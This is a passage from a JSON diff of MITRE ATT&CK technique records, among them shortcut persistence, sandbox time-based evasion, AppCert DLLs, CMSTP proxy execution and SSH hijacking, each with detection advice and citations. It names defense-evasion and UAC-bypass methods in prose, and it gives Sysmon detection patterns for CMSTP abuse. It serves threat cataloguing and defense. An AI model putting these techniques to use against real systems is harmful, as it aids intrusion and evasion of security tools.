attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.\n\nMonitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", + "created": "2020-01-24T19:00:32.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/009", + "external_id": "T1547.009" + }, + { + "source_name": "Shortcut for Persistence ", + "description": "Elastic. (n.d.). Shortcut File Written or Modified for Persistence. Retrieved June 1, 2022.", + "url": "https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence" + }, + { + "source_name": "BSidesSLC 2020 - LNK Elastic", + "description": "French, D., Filar, B.. (2020, March 21). A Chain Is No Stronger Than Its Weakest LNK. Retrieved November 30, 2020.", + "url": "https://www.youtube.com/watch?v=nJ0UsyiUEqQ" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-31T14:00:00.188Z", + "name": "Application Window Discovery", + "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)\n\nAdversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", + "created": "2017-05-31T21:30:24.512Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1010", + "external_id": "T1010" + }, + { + "source_name": "ESET Grandoreiro April 2020", + "description": "ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.", + "url": "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/" + }, + { + "source_name": "Prevailion DarkWatchman 2021", + "description": "Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.", + "url": "https://www.prevailion.com/darkwatchman-new-fileless-techniques/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Standard Cryptographic Protocol", + "description": "Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels. (Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. (Citation: SEI SSL Inspection Risks)\n\nIf malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "created": "2017-05-31T21:30:35.334Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1032", + "external_id": "T1032" + }, + { + "source_name": "SANS Decrypting SSL", + "description": "Butler, M. (2013, November). Finding Hidden Threats by Decrypting SSL. Retrieved April 5, 2016.", + "url": "http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840" + }, + { + "source_name": "SEI SSL Inspection Risks", + "description": "Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved April 5, 2016.", + "url": "https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html" + }, + { + "source_name": "Fidelis DarkComet", + "description": "Fidelis Cybersecurity. (2015, August 4). Looking at the Sky for a DarkComet. Retrieved April 5, 2016.", + "url": "https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Email Account", + "description": "Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)\n\nIn on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)\n\nIn Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365", + "Google Workspace" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470", + "created": "2020-02-21T21:08:33.237Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1087/003", + "external_id": "T1087.003" + }, + { + "source_name": "Microsoft Exchange Address Lists", + "description": "Microsoft. (2020, February 7). Address lists in Exchange Server. Retrieved March 26, 2020.", + "url": "https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019" + }, + { + "source_name": "Microsoft getglobaladdresslist", + "description": "Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6, 2019.", + "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist" + }, + { + "source_name": "Black Hills Attacking Exchange MailSniper, 2016", + "description": "Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper. Retrieved October 6, 2019.", + "url": "https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/" + }, + { + "source_name": "Google Workspace Global Access List", + "description": "Google. (n.d.). Retrieved March 16, 2021.", + "url": "https://support.google.com/a/answer/166870?hl=en" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Hypervisor", + "description": "**This technique has been deprecated and should no longer be used.**\n\nA type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_detection": "Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present. (Citation: virtualization.info 2006)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4be89c7c-ace6-4876-9377-c8d54cef3d63", + "created": "2017-05-31T21:30:50.958Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1062", + "external_id": "T1062" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/552.html", + "external_id": "CAPEC-552" + }, + { + "source_name": "Wikipedia Hypervisor", + "description": "Wikipedia. (2016, May 23). Hypervisor. Retrieved June 11, 2016.", + "url": "https://en.wikipedia.org/wiki/Hypervisor" + }, + { + "source_name": "Wikipedia Xen", + "description": "Xen. (n.d.). In Wikipedia. Retrieved November 13, 2014.", + "url": "http://en.wikipedia.org/wiki/Xen" + }, + { + "source_name": "Myers 2007", + "description": "Myers, M., and Youndt, S. (2007). An Introduction to Hardware-Assisted Virtual Machine (HVM) Rootkits. Retrieved November 13, 2014.", + "url": "http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&rep=rep1&type=pdf" + }, + { + "source_name": "virtualization.info 2006", + "description": "virtualization.info. (Interviewer) & Liguori, A. (Interviewee). (2006, August 11). Debunking Blue Pill myth [Interview transcript]. Retrieved November 13, 2014.", + "url": "http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Time Based Evasion", + "description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\n\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)\n\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)\n\nAdversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jorge Orchilles, SCYTHE", + "Ruben Dodge, @shotgunner101", + "Jeff Felling, Red Canary", + "Deloitte Threat Library Team" + ], + "x_mitre_detection": "Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host forensic analysis", + "Signature-based detection", + "Static File Analysis", + "Anti-virus" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", + "created": "2020-03-06T21:11:11.225Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1497/003", + "external_id": "T1497.003" + }, + { + "source_name": "Deloitte Environment Awareness", + "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.", + "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc" + }, + { + "source_name": "Revil Independence Day", + "description": "Loman, M. et al. (2021, July 4). Independence Day: REvil uses supply chain exploit to attack hundreds of businesses. Retrieved September 30, 2021.", + "url": "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/" + }, + { + "source_name": "Netskope Nitol", + "description": "Malik, A. (2016, October 14). Nitol Botnet makes a resurgence with evasive sandbox analysis technique. Retrieved September 30, 2021.", + "url": "https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique" + }, + { + "source_name": "Joe Sec Nymaim", + "description": "Joe Security. (2016, April 21). Nymaim - evading Sandboxes with API hammering. Retrieved September 30, 2021.", + "url": "https://www.joesecurity.org/blog/3660886847485093803" + }, + { + "source_name": "Joe Sec Trickbot", + "description": "Joe Security. (2020, July 13). TrickBot's new API-Hammering explained. Retrieved September 30, 2021.", + "url": "https://www.joesecurity.org/blog/498839998833561473" + }, + { + "source_name": "ISACA Malware Tricks", + "description": "Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.", + "url": "https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "AppCert DLLs", + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) \n\nTools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "Administrator", + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4bf5845d-a814-4490-bc5c-ccdee6043025", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1182", + "external_id": "T1182" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + }, + { + "source_name": "Sysinternals AppCertDlls Oct 2007", + "description": "Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. Retrieved December 18, 2017.", + "url": "https://forum.sysinternals.com/appcertdlls_topic12546.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:04.993Z", + "name": "Manipulation of View", + "description": "Adversaries may attempt to manipulate the information reported back to operators or controllers. This manipulation may be short term or sustained. During this time the process itself could be in a much different state than what is reported. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nOperators may be fooled into doing something that is harmful to the system in a loss of view situation. With a manipulated view into the systems, operators may issue inappropriate control sequences that introduce faults or catastrophic failures into the system. Business analysis systems can also be provided with inaccurate data leading to bad management decisions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0832", + "external_id": "T0832" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "CMSTP", + "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Nik Seetharaman, Palantir", + "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "created": "2020-01-23T18:27:30.656Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/003", + "external_id": "T1218.003" + }, + { + "source_name": "Twitter CMSTP Usage Jan 2018", + "description": "Carr, N. (2018, January 31). Here is some early bad cmstp.exe... Retrieved April 11, 2018.", + "url": "https://twitter.com/ItsReallyNick/status/958789644165894146" + }, + { + "source_name": "Microsoft Connection Manager Oct 2009", + "description": "Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018.", + "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)" + }, + { + "source_name": "MSitPros CMSTP Aug 2017", + "description": "Moe, O. (2017, August 15). Research on CMSTP.exe. Retrieved April 11, 2018.", + "url": "https://msitpros.com/?p=3960" + }, + { + "source_name": "GitHub Ultimate AppLocker Bypass List", + "description": "Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.", + "url": "https://github.com/api0cradle/UltimateAppLockerByPassList" + }, + { + "source_name": "Endurant CMSTP July 2018", + "description": "Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved August 6, 2018.", + "url": "http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/" + }, + { + "source_name": "Twitter CMSTP Jan 2018", + "description": "Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved April 11, 2018.", + "url": "https://twitter.com/NickTyrer/status/958450014111633408" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "SSH Hijacking", + "description": "Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\n\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)\n\n[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Anastasios Pingios" + ], + "x_mitre_detection": "Use of SSH may be legitimate, depending upon the network 